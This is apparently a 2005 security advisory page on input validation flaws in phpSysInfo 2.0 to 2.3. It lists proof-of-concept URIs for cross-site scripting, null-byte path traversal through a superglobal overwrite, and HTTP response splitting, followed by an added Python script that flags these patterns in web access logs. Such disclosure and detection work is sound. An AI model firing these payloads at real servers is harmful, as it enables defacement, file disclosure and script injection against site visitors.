

Title PHPSysInfo Multiple Input Validation Vulnerabilities
Published 2005-11-11-12:00AM
Updated 2005-11-11-08:00PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  These issues were disclosed in the referenced Hardened-PHP Project advisory.
Vulnerable  phpSysInfo phpSysInfo 2.3
phpSysInfo phpSysInfo 2.1
phpSysInfo phpSysInfo 2.0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
Not Vulnerable  phpSysInfo phpSysInfo 2.4
Code   No exploit is required.

The following proof-of-concept URIs are available:
http://www.example.com/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00
http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00
http://www.example.com//index.php?sensor_program=lmsensors.inc.php/../../README%00

http://www.example.com/index.php?charset=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Hacked!</html>
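
From a defender's side, the URIs above share patterns that can be flagged in web access logs. The following is an added example, not part of the original advisory: it decodes each query string and reports markup characters, `../` sequences, a decoded NUL byte, CR/LF in a value, and parameter names that address a PHP superglobal. The finding labels, the function name and the benign sample request are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# PHP superglobal names; a request parameter should never be named after one.
SUPERGLOBAL = re.compile(
    r"^(_(SERVER|GET|POST|COOKIE|ENV|FILES|REQUEST|SESSION)|GLOBALS)(\[|$)")

def classify(request_uri):
    """Return a sorted list of findings for one request URI."""
    findings = set()
    query = urlsplit(request_uri).query
    # parse_qsl percent-decodes each name and value once, so %00 and
    # %0d%0a are inspected as the raw characters they encode.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if SUPERGLOBAL.match(name):
            findings.add("superglobal-overwrite")
        if "\x00" in value:
            findings.add("null-byte")
        if "\r" in value or "\n" in value:
            findings.add("crlf-injection")
        if "../" in value or "..\\" in value:
            findings.add("path-traversal")
        if re.search(r'[<>"]', value):
            findings.add("markup-in-value")
    return sorted(findings)

# Request URIs as they would appear in an access log. The first four reuse
# the query strings listed on this page (the charset one is shortened);
# the last is a constructed benign request.
SAMPLES = [
    "/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E",
    "/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00",
    "/index.php?sensor_program=lmsensors.inc.php/../../README%00",
    "/index.php?charset=%0d%0aContent-Length:%200",
    "/index.php?lng=en&charset=utf-8",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(classify(uri) or ["clean"], uri)
```
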

Copyright 2007, SecurityDot